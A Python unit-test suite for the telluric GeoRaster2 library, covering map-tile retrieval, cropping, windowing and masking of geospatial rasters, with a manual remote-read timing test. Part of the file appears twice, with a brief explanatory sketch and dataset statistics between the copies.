raster._populate_from_rasterio_object(read_image=True)
tile11 = raster.get_tile(*tiles[11])
cropped_11 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[11])
self.assertEqual(tile11, cropped_11)
def test_crop_image_from_and_get_win_do_the_same_full_resolution(self):
bounds = (20, 13, 40, 15)
win = rasterio.windows.Window(bounds[0], bounds[1], bounds[2] - bounds[0], bounds[3] - bounds[1])
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
saved_raster = GeoRaster2.open(rf.name)
cropped_win = saved_raster.get_window(win)
cropped_image = raster._crop(bounds)
self.assertEqual(cropped_image, cropped_win)
@patch.object(GeoRaster2, '_crop')
def test_crop_use_crop_image_for_a_loaded_image(self, mock__crop):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
mock__crop.assert_called_once()
@patch.object(GeoRaster2, 'get_window')
def test_crop_use_get_window_for_a_not_loaded_image(self, mock_get_window):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
mock_get_window.assert_called_once()
def test_crop_returns_full_resolution_as_default(self):
coords = mercantile.xy_bounds(*tiles[17])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
_, win = raster._vector_to_raster_bounds(shape)
cropped = raster.crop(shape)
self.assertEqual(cropped.shape, (raster.num_bands, round(win.height), round(win.width)))
self.assertEqual(cropped.affine[0], raster.affine[0])
def test_memory_crop_returns_resized_resolution(self):
coords = mercantile.xy_bounds(*tiles[18])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
cropped = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[18])
self.assertEqual(cropped.shape, (raster.num_bands, 256, 256))
self.assertAlmostEqual(cropped.affine[0], MERCATOR_RESOLUTION_MAPPING[18], 2)
def test_geographic_crop(self):
raster = self.read_only_virtual_geo_raster_wgs84()
rhombus_on_image = Polygon([[0, 2], [1, 1], [2, 2], [1, 3]]) # in pixels
rhombus_world = raster.to_world(rhombus_on_image)
cropped = raster.crop(rhombus_world)
r = raster[0:2, 1:3]
assert cropped == r
def test_geographic_crop_with_resize(self):
coords = mercantile.xy_bounds(*tiles[17])
raster = self.read_only_virtual_geo_raster_wgs84()
vector = GeoVector(Polygon.from_bounds(*coords), crs=WEB_MERCATOR_CRS)
x_ex_res, y_ex_res = convert_resolution_from_meters_to_deg(
self.metric_affine[6], MERCATOR_RESOLUTION_MAPPING[17])
cropped = raster.crop(vector, (x_ex_res, y_ex_res))
self.assertAlmostEqual(cropped.affine[0], x_ex_res)
self.assertAlmostEqual(abs(cropped.affine[4]), y_ex_res, 6)
def test_crop_raises_error_for_impossible_transformation(self):
raster = self.read_only_virtual_geo_raster()
vector = GeoVector(Polygon.from_bounds(-180, -90, 180, 90), crs=WGS84_CRS)
with self.assertRaises(GeoRaster2Error):
raster.crop(vector)
def test_crop_of_rasters_with_opposite_affine_and_data_return_the_same(self):
array = np.arange(0, 20).reshape(1, 4, 5)
array2 = np.arange(19, -1, -1).reshape(1, 4, 5)
array2.sort()
image1 = np.ma.array(array, mask=False)
image2 = np.ma.array(array2, mask=False)
aff2 = Affine.translation(0, -8) * Affine.scale(2, 2)
aff = Affine.scale(2, -2)
r1 = GeoRaster2(image=image1, affine=aff, crs=WEB_MERCATOR_CRS)
r2 = GeoRaster2(image=image2, affine=aff2, crs=WEB_MERCATOR_CRS)
# r1 == r2 # doesn't work, see https://github.com/satellogic/telluric/issues/79
roi = GeoVector(Polygon.from_bounds(0, 0, 3, -3), crs=WEB_MERCATOR_CRS)
r1c = r1.crop(roi)
r2c = r2.crop(roi)
# r1c == r2c # doesn't work, see https://github.com/satellogic/telluric/issues/79
# currently this is the only way to test the result is the same
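# r2's y scale is positive, so its rows are stored bottom-up relative to r1; flipping along axis=1 (the row axis) aligns the two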
assert np.all(np.flip(r1c.image, axis=1) == r2c.image)
class GeoRasterMaskedTest(TestCase):
@classmethod
def setUpClass(cls):
cls.dir = TemporaryDirectory()
path = os.path.join(cls.dir.name, 'test_masked_raster.tif')
cls.masked_raster().save(path)
cls.read_only_vgr = GeoRaster2.open(path)
@classmethod
def tearDownClass(cls):
cls.dir.cleanup()
@classmethod
def masked_raster(cls):
data = np.array([
[0, 1, 1, 1],
[0, 2, 0, 2],
[0, 3, 3, 3],
], dtype=np.uint8)
mask = np.array([
[True, False, False, False],
[True, False, False, False],
[True, False, False, False],
], dtype=bool)
image = np.ma.array(
np.repeat(data[np.newaxis, :, :], 3, 0),
mask=np.repeat(mask[np.newaxis, :, :], 3, 0)
)
# Don't use exactly -1.0 for the affine for rasterio < 1.0a13, see
# https://github.com/mapbox/rasterio/issues/1272
affine = Affine.scale(1, -1.0001) * Affine.translation(0, -3)
crs = WGS84_CRS
return GeoRaster2(
image, affine=affine, crs=crs,
)
def read_only_virtual_geo_raster(self):
return self.read_only_vgr
def test_get_smaller_window_respects_mask(self):
window = Window(1, 0, 3, 3)
raster = self.read_only_virtual_geo_raster()
cropped = raster.get_window(window, masked=True)
assert (~cropped.image.mask).all()
def test_get_bigger_window_respects_mask(self):
window = Window(1, 0, 4, 3)
raster = self.read_only_virtual_geo_raster()
cropped = raster.get_window(window, masked=True)
assert cropped.image[:, :, -1].mask.all() # This line of pixels is masked
assert (~cropped.image[:, :, :-1].mask).all() # The rest is not masked
def test_small_read_only_virtual_geo_raster_wgs84_crop():
# See https://github.com/satellogic/telluric/issues/61
roi = GeoVector.from_bounds(xmin=0, ymin=0, xmax=2, ymax=2, crs=WGS84_CRS)
resolution = 1.0 # deg / px
raster = GeoRaster2.empty_from_roi(roi, resolution)
assert raster.crop(roi) == raster.crop(roi, raster.resolution())
@manualtest
class GeoRaster2ManualTest(TestCase):
"""manual testing To be run manually only."""
files = {
'original': 'original2.tif',
'cloudoptimized aligned': 'original2_aligned_cloudoptimized-2.tif',
'mrf aligned': 'original2_aligned.mrf',
'cloudoptimized': 'original2_cloudoptimized-2.tif',
'mrf': 'original2.mrf',
'not aligned cloudoptimized': 'not_aligned_cloudoptimized_2.tif',
'not aligned mrf': 'not_aligned.mrf',
'not aligned mrf split': 'not_aligned_split.mrf',
'aligned mrf split': 'original2_aligned_split.mrf',
'original mrf split': 'original2_split.mrf',
}
resamplings = {
# 'average': Resampling.average,
# 'nearest': Resampling.nearest,
# 'bilinear': Resampling.bilinear,
'cubic': Resampling.cubic
}
def random_string(self):
import hashlib
now = '%s' % datetime.now()
return hashlib.md5(now.encode('utf-8')).hexdigest()
def run_test_on_real_rasters(self, zoom, resampling, local):
results_arr = np.empty(shape=(len(self.files)), dtype=object)
# with rasterio.Env(CPL_DEBUG=True, GDAL_CACHEMAX=0):
# with rasterio.Env(CPL_DEBUG=False):
print('*' * 80)
print(zoom)
print('*' * 80)
print('#' * 80)
print(resampling.name)
print('#' * 80)
for i, (file_type, file_url) in enumerate(self.files.items()):
if local or 'split' in file_type:
base_url = './notebooks/'
else:
base_url = 'https://ariel.blob.core.windows.net/rastersfortest/'
file_url = base_url + file_url
if local and 'mrf' not in file_type:
new_file = file_url + self.random_string()
os.system("cp %s %s" % (file_url, new_file))
else:
new_file = file_url
print('file type: %s' % file_type)
print('-' * 80)
print('file_url: %s' % file_url)
print('new_file: %s' % new_file)
print('-' * 80)
vr = GeoRaster2.open(new_file)
start = datetime.now()
rasterio_ops = {
'CPL_DEBUG': True,
'GDAL_DISABLE_READDIR_ON_OPEN': 'YES'
}
if 'mrf' not in file_type:
rasterio_ops['CPL_VSIL_CURL_ALLOWED_EXTENSIONS'] = '.tif'
with rasterio.Env(**rasterio_ops):
vr.get_tile(*tiles[zoom], resampling=resampling)
end = datetime.now()
tt = (end - start).total_seconds() * 1000
print("stars time : %s end time: %s total: %s ms" % (start, end, tt))
results_arr[i] = "type: %s, zoom: %i, resampling: %s time: %s msec" % (file_type, zoom,
resampling.name, tt)
if local and 'mrf' not in file_type:
os.system("rm -f %s" % (new_file))
print('=' * 80)
print(results_arr)
def test_zoom_remote_11_resampling_cubic(self):
self.run_test_on_real_rasters(11, Resampling.cubic, False)
def test_zoom_remote_12_resampling_cubic(self):
self.run_test_on_real_rasters(12, Resampling.cubic, False)
def test_zoom_remote_14_resampling_cubic(self):
self.run_test_on_real_rasters(14, Resampling.cubic, False)
def test_zoom_remote_15_resampling_cubic(self):
self.run_test_on_real_rasters(15, Resampling.cubic, False)
def test_zoom_remote_17_resampling_cubic(self):
self.run_test_on_real_rasters(17, Resampling.cubic, False)
def test_zoom_remote_18_resampling_cubic(self):
self.run_test_on_real_rasters(18, Resampling.cubic, False)
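The suite above repeatedly checks that get_tile(x, y, z) and crop() over the same mercator tile bounds agree. A minimal standalone sketch of that equivalence check, reusing the suite's own fixture path and one of its tile coordinates (everything else is taken from the imports already in this file):
import mercantile
from shapely.geometry import Polygon
from telluric import GeoRaster2, GeoVector
from telluric.constants import WEB_MERCATOR_CRS
from telluric.georaster import MERCATOR_RESOLUTION_MAPPING

raster = GeoRaster2.open("./tests/data/raster/raster_for_test.tif")  # same fixture as BaseGeoRasterTestCase
x, y, z = 18554, 12624, 15  # tiles[15] from the suite
tile = raster.get_tile(x, y, z)
bounds = mercantile.xy_bounds(x, y, z)
roi = GeoVector(Polygon.from_bounds(*bounds), WEB_MERCATOR_CRS)
cropped = raster.crop(roi, MERCATOR_RESOLUTION_MAPPING[z])
print(tile == cropped)  # the skipped @window_data tests expect True here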
| 41.684746
| 113
| 0.654591
|
import os
import rasterio
import mercantile
import numpy as np
import pytest
from tempfile import NamedTemporaryFile, TemporaryDirectory
from affine import Affine
from unittest import TestCase
from unittest.mock import patch
from datetime import datetime
from shapely.geometry import Polygon
from rasterio.enums import Resampling
from rasterio.windows import Window
from rasterio.crs import CRS
from telluric import GeoRaster2, GeoVector
from telluric.constants import WEB_MERCATOR_CRS, WGS84_CRS
from telluric.georaster import MERCATOR_RESOLUTION_MAPPING, GeoRaster2Error, GeoRaster2IOError
from telluric.util.general import convert_resolution_from_meters_to_deg
import sys
import logging
import tempfile
log = logging.getLogger('rasterio._gdal')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
manualtest = pytest.mark.skipif("TEST_MANUAL" not in os.environ, reason="skip on auto testing")
window_data = pytest.mark.skip('pending decision on consistency of results between rasterio read and reproject')
framing = pytest.mark.skip('waiting for framing and get_window with boundless=False')
tiles = {
10: (579, 394, 10),
11: (1159, 789, 11),
12: (2319, 1578, 12),
14: (9277, 6312, 14),
15: (18554, 12624, 15),
17: (74216, 50496, 17),
18: (148433, 100994, 18)
}
class GeoRaster2TilesTestGeneral(TestCase):
def test_raise_exception_on_bad_file_path(self):
vr = GeoRaster2.open('stam')
with self.assertRaises(GeoRaster2IOError):
vr.get_tile(1, 2, 3)
def test_raise_exception_on_bad_raster_url(self):
vr = GeoRaster2.open('http://stam')
with self.assertRaises(GeoRaster2IOError):
vr.get_tile(1, 2, 3)
def test_raise_exception_on_bad_file_path_save_cog(self):
vr = GeoRaster2.open('stam')
with self.assertRaises(GeoRaster2IOError):
vr.save_cloud_optimized('dest_file')
def test_raise_exception_on_bad_raster_url_save_cog(self):
vr = GeoRaster2.open('http://stam')
with self.assertRaises(GeoRaster2IOError):
vr.save_cloud_optimized('dest_file')
class BaseGeoRasterTestCase(TestCase):
@classmethod
def setUpClass(cls):
path = "./tests/data/raster/raster_for_test.tif"
cls.read_only_vgr = GeoRaster2.open(path)
path = "./tests/data/raster/raster_wgs84.tif"
cls.read_only_vgr_wgs84 = GeoRaster2.open(path)
def read_only_virtual_geo_raster(self):
return self.read_only_vgr
def read_only_virtual_geo_raster_wgs84(self):
return self.read_only_vgr_wgs84
class GeoRaster2TestGetTile(BaseGeoRasterTestCase):
def test_geo_bounding_tile(self):
gr = self.read_only_virtual_geo_raster()
gv = gr.footprint().reproject(WGS84_CRS)
bounding_tile = mercantile.bounding_tile(*gv.get_shape(gv.crs).bounds)
self.assertEqual(bounding_tile, (37108, 25248, 16))
@patch.object(GeoRaster2, 'crop')
def test_fails_with_empty_raster_for_tile_out_of_raster_area(self, mock__crop):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
r = raster.get_tile(16384, 16383, 15)
self.assertTrue((r.image.data == 0).all())
self.assertTrue((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
self.assertEqual(r.crs, WEB_MERCATOR_CRS)
mock__crop.assert_not_called()
def test_get_all_raster_in_a_single_tile(self):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
p = raster.footprint().reproject(WGS84_CRS).centroid
r = raster.get_tile(*mercantile.tile(lng=p.x, lat=p.y, zoom=11))
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
self.assertEqual(r.crs, WEB_MERCATOR_CRS)
def test_get_tile_for_different_zoom_levels(self):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
for zoom in tiles:
r = raster.get_tile(*tiles[zoom])
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_tile_from_different_crs_tile_is_not_tilted(self):
raster = self.read_only_virtual_geo_raster_wgs84()
r = raster.get_tile(*tiles[18])
self.assertEqual(1, len(np.unique(r.image.mask)))
def test_get_tile_from_different_crs_tile_is_not_tilted_with_different_buffer(self):
raster = self.read_only_virtual_geo_raster_wgs84()
os.environ["TELLURIC_GET_TILE_BUFFER"] = "0"
try:
r = raster.get_tile(*tiles[18])
finally:
del os.environ["TELLURIC_GET_TILE_BUFFER"]
self.assertEqual(2, len(np.unique(r.image.mask)))
def test_get_entire_all_raster(self):
vr = self.read_only_virtual_geo_raster()
roi = GeoVector.from_xyz(37108, 25248, 16)
r = vr.crop(roi)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.shape, (3, 612, 612))
def test_fails_with_empty_raster_for_tile_out_of_raster_area_with_no_tile_size(self):
vr = self.read_only_virtual_geo_raster()
roi = GeoVector.from_xyz(16384, 16383, 15)
r = vr.crop(roi)
self.assertTrue((r.image.data == 0).all())
self.assertTrue((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 1223, 1223))
def test_get_window_of_full_resolution(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 300)
r = vr.get_window(win)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 300, 300))
def test_get_window_resize_to_256(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 300)
r = vr.get_window(win, xsize=256, ysize=256)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_window_of_non_square_resize_to_256(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, xsize=256, ysize=256)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_window_of_non_square_keeps_size_proportions_for_give_xsize(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, xsize=150)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 200, 150))
def test_get_window_of_non_square_keeps_size_proportions_for_give_ysize(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, ysize=200)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 200, 150))
def test_get_window_width_height_correctness(self):
vr = self.read_only_virtual_geo_raster()
expected_height = 200
win = Window(0, vr.height - expected_height, 1, expected_height)
r = vr.get_window(win)
self.assertEqual(r.image.shape, (3, expected_height, 1))
class GeoRasterCropTest(BaseGeoRasterTestCase):
metric_affine = Affine(1, 0.0, 2653750, 0.0, -1, 4594461)
def test_crop_in_memory_and_off_memory_without_resizing_are_the_same(self):
coords = mercantile.xy_bounds(*tiles[18])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster2 = GeoRaster2.open(rf.name)
off_memory_crop = raster2.crop(shape)
raster2.image
in_memory_crop = raster2.crop(shape)
self.assertEqual(off_memory_crop, in_memory_crop)
@window_data
def test_crop_and_get_tile_do_the_same(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster2 = GeoRaster2.open(rf.name)
tile15 = raster2.get_tile(*tiles[15])
raster2.image
cropped15 = raster2.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped15)
@window_data
def test_crop_and_get_tile_do_the_same_when_image_is_populated(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
tile15 = raster.get_tile(*tiles[15])
raster._populate_from_rasterio_object(read_image=True)
cropped_15 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped_15)
@window_data
def test_crop_image_from_and_get_win_do_the_same_with_resize(self):
bounds = (2, 3, 4, 5)
win = rasterio.windows.Window(bounds[0], bounds[1], bounds[2] - bounds[0], bounds[3] - bounds[1])
xsize = round((bounds[2] - bounds[0]) / 2)
ysize = round((bounds[3] - bounds[1]) / 2)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster.save('area.tif', tags={'AREA_OR_POINT': 'Area'})
raster.save('point.tif', tags={'AREA_OR_POINT': 'Point'})
saved_raster = GeoRaster2.open(rf.name)
cropped_win = saved_raster.get_window(win, xsize=xsize, ysize=ysize)
saved_raster_area = GeoRaster2.open('area.tif')
cropped_win_area = saved_raster_area.get_window(win, xsize=xsize, ysize=ysize)
saved_raster_point = GeoRaster2.open('point.tif')
cropped_win_point = saved_raster_point.get_window(win, xsize=xsize, ysize=ysize)
cropped_image = raster._crop(bounds, xsize=xsize, ysize=ysize)
print('cropped_win_area pixels\n', cropped_win_area.image)
print('cropped_win_point pixels\n', cropped_win_point.image)
print('cropped_win pixels\n', cropped_win.image)
print('cropped_image pixels\n', cropped_image.image)
if (cropped_win_point == cropped_win_area):
print('point == area')
if (cropped_image == cropped_win_area):
print('image == area')
if (cropped_image == cropped_win_point):
print('image == point')
if (cropped_win == cropped_win_area):
print('win == area')
if (cropped_win == cropped_win_point):
print('win == point')
self.assertEqual(cropped_image, cropped_win)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_high_zoom(self):
coords = mercantile.xy_bounds(*tiles[17])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile17 = raster.get_tile(*tiles[17])
cropped_17 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[17])
self.assertEqual(tile17, cropped_17)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_mid_zoom(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile15 = raster.get_tile(*tiles[15])
cropped_15 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped_15)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_for_low_zoom(self):
coords = mercantile.xy_bounds(*tiles[11])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile11 = raster.get_tile(*tiles[11])
cropped_11 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[11])
self.assertEqual(tile11, cropped_11)
def test_crop_image_from_and_get_win_do_the_same_full_resolution(self):
bounds = (20, 13, 40, 15)
win = rasterio.windows.Window(bounds[0], bounds[1], bounds[2] - bounds[0], bounds[3] - bounds[1])
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
saved_raster = GeoRaster2.open(rf.name)
cropped_win = saved_raster.get_window(win)
cropped_image = raster._crop(bounds)
self.assertEqual(cropped_image, cropped_win)
@patch.object(GeoRaster2, '_crop')
def test_crop_use_crop_image_for_a_loaded_image(self, mock__crop):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
mock__crop.assert_called_once()
@patch.object(GeoRaster2, 'get_window')
def test_crop_use_get_window_for_a_not_loaded_image(self, mock_get_window):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
mock_get_window.assert_called_once()
def test_crop_returns_full_resolution_as_default(self):
coords = mercantile.xy_bounds(*tiles[17])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
_, win = raster._vector_to_raster_bounds(shape)
cropped = raster.crop(shape)
self.assertEqual(cropped.shape, (raster.num_bands, round(win.height), round(win.width)))
self.assertEqual(cropped.affine[0], raster.affine[0])
def test_memory_crop_returns_resized_resolution(self):
coords = mercantile.xy_bounds(*tiles[18])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
cropped = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[18])
self.assertEqual(cropped.shape, (raster.num_bands, 256, 256))
self.assertAlmostEqual(cropped.affine[0], MERCATOR_RESOLUTION_MAPPING[18], 2)
def test_geographic_crop(self):
raster = self.read_only_virtual_geo_raster_wgs84()
rhombus_on_image = Polygon([[0, 2], [1, 1], [2, 2], [1, 3]])
rhombus_world = raster.to_world(rhombus_on_image)
cropped = raster.crop(rhombus_world)
r = raster[0:2, 1:3]
assert cropped == r
def test_geographic_crop_with_resize(self):
coords = mercantile.xy_bounds(*tiles[17])
raster = self.read_only_virtual_geo_raster_wgs84()
vector = GeoVector(Polygon.from_bounds(*coords), crs=WEB_MERCATOR_CRS)
x_ex_res, y_ex_res = convert_resolution_from_meters_to_deg(
self.metric_affine[6], MERCATOR_RESOLUTION_MAPPING[17])
cropped = raster.crop(vector, (x_ex_res, y_ex_res))
self.assertAlmostEqual(cropped.affine[0], x_ex_res)
self.assertAlmostEqual(abs(cropped.affine[4]), y_ex_res, 6)
def test_crop_raises_error_for_impossible_transformation(self):
raster = self.read_only_virtual_geo_raster()
vector = GeoVector(Polygon.from_bounds(-180, -90, 180, 90), crs=WGS84_CRS)
with self.assertRaises(GeoRaster2Error):
raster.crop(vector)
def test_crop_of_rasters_with_opposite_affine_and_data_return_the_same(self):
array = np.arange(0, 20).reshape(1, 4, 5)
array2 = np.arange(19, -1, -1).reshape(1, 4, 5)
array2.sort()
image1 = np.ma.array(array, mask=False)
image2 = np.ma.array(array2, mask=False)
aff2 = Affine.translation(0, -8) * Affine.scale(2, 2)
aff = Affine.scale(2, -2)
r1 = GeoRaster2(image=image1, affine=aff, crs=WEB_MERCATOR_CRS)
r2 = GeoRaster2(image=image2, affine=aff2, crs=WEB_MERCATOR_CRS)
roi = GeoVector(Polygon.from_bounds(0, 0, 3, -3), crs=WEB_MERCATOR_CRS)
r1c = r1.crop(roi)
r2c = r2.crop(roi)
# r1c == r2c # doesn't work, see https://github.com/satellogic/telluric/issues/79
assert np.all(np.flip(r1c.image, axis=1) == r2c.image)
class GeoRasterMaskedTest(TestCase):
@classmethod
def setUpClass(cls):
cls.dir = TemporaryDirectory()
path = os.path.join(cls.dir.name, 'test_masked_raster.tif')
cls.masked_raster().save(path)
cls.read_only_vgr = GeoRaster2.open(path)
@classmethod
def tearDownClass(cls):
cls.dir.cleanup()
@classmethod
def masked_raster(cls):
data = np.array([
[0, 1, 1, 1],
[0, 2, 0, 2],
[0, 3, 3, 3],
], dtype=np.uint8)
mask = np.array([
[True, False, False, False],
[True, False, False, False],
[True, False, False, False],
], dtype=bool)
image = np.ma.array(
np.repeat(data[np.newaxis, :, :], 3, 0),
mask=np.repeat(mask[np.newaxis, :, :], 3, 0)
)
# https://github.com/mapbox/rasterio/issues/1272
affine = Affine.scale(1, -1.0001) * Affine.translation(0, -3)
crs = WGS84_CRS
return GeoRaster2(
image, affine=affine, crs=crs,
)
def read_only_virtual_geo_raster(self):
return self.read_only_vgr
def test_get_smaller_window_respects_mask(self):
window = Window(1, 0, 3, 3)
raster = self.read_only_virtual_geo_raster()
cropped = raster.get_window(window, masked=True)
assert (~cropped.image.mask).all()
def test_get_bigger_window_respects_mask(self):
window = Window(1, 0, 4, 3)
raster = self.read_only_virtual_geo_raster()
cropped = raster.get_window(window, masked=True)
assert cropped.image[:, :, -1].mask.all() # This line of pixels is masked
assert (~cropped.image[:, :, :-1].mask).all() # The rest is not masked
def test_small_read_only_virtual_geo_raster_wgs84_crop():
# See https://github.com/satellogic/telluric/issues/61
roi = GeoVector.from_bounds(xmin=0, ymin=0, xmax=2, ymax=2, crs=WGS84_CRS)
resolution = 1.0 # deg / px
raster = GeoRaster2.empty_from_roi(roi, resolution)
assert raster.crop(roi) == raster.crop(roi, raster.resolution())
@manualtest
class GeoRaster2ManualTest(TestCase):
files = {
'original': 'original2.tif',
'cloudoptimized aligned': 'original2_aligned_cloudoptimized-2.tif',
'mrf aligned': 'original2_aligned.mrf',
'cloudoptimized': 'original2_cloudoptimized-2.tif',
'mrf': 'original2.mrf',
'not aligned cloudoptimized': 'not_aligned_cloudoptimized_2.tif',
'not aligned mrf': 'not_aligned.mrf',
'not aligned mrf split': 'not_aligned_split.mrf',
'aligned mrf split': 'original2_aligned_split.mrf',
'original mrf split': 'original2_split.mrf',
}
resamplings = {
# 'average': Resampling.average,
# 'nearest': Resampling.nearest,
# 'bilinear': Resampling.bilinear,
'cubic': Resampling.cubic
}
def random_string(self):
import hashlib
now = '%s' % datetime.now()
return hashlib.md5(now.encode('utf-8')).hexdigest()
def run_test_on_real_rasters(self, zoom, resampling, local):
results_arr = np.empty(shape=(len(self.files)), dtype=object)
# with rasterio.Env(CPL_DEBUG=True, GDAL_CACHEMAX=0):
# with rasterio.Env(CPL_DEBUG=False):
print('*' * 80)
print(zoom)
print('*' * 80)
print('#' * 80)
print(resampling.name)
print('#' * 80)
for i, (file_type, file_url) in enumerate(self.files.items()):
if local or 'split' in file_type:
base_url = './notebooks/'
else:
base_url = 'https://ariel.blob.core.windows.net/rastersfortest/'
file_url = base_url + file_url
if local and 'mrf' not in file_type:
new_file = file_url + self.random_string()
os.system("cp %s %s" % (file_url, new_file))
else:
new_file = file_url
print('file type: %s' % file_type)
print('-' * 80)
print('file_url: %s' % file_url)
print('new_file: %s' % new_file)
print('-' * 80)
vr = GeoRaster2.open(new_file)
start = datetime.now()
rasterio_ops = {
'CPL_DEBUG': True,
'GDAL_DISABLE_READDIR_ON_OPEN': 'YES'
}
if 'mrf' not in file_type:
rasterio_ops['CPL_VSIL_CURL_ALLOWED_EXTENSIONS'] = '.tif'
with rasterio.Env(**rasterio_ops):
vr.get_tile(*tiles[zoom], resampling=resampling)
end = datetime.now()
tt = (end - start).total_seconds() * 1000
print("stars time : %s end time: %s total: %s ms" % (start, end, tt))
results_arr[i] = "type: %s, zoom: %i, resampling: %s time: %s msec" % (file_type, zoom,
resampling.name, tt)
if local and 'mrf' not in file_type:
os.system("rm -f %s" % (new_file))
print('=' * 80)
print(results_arr)
def test_zoom_remote_11_resampling_cubic(self):
self.run_test_on_real_rasters(11, Resampling.cubic, False)
def test_zoom_remote_12_resampling_cubic(self):
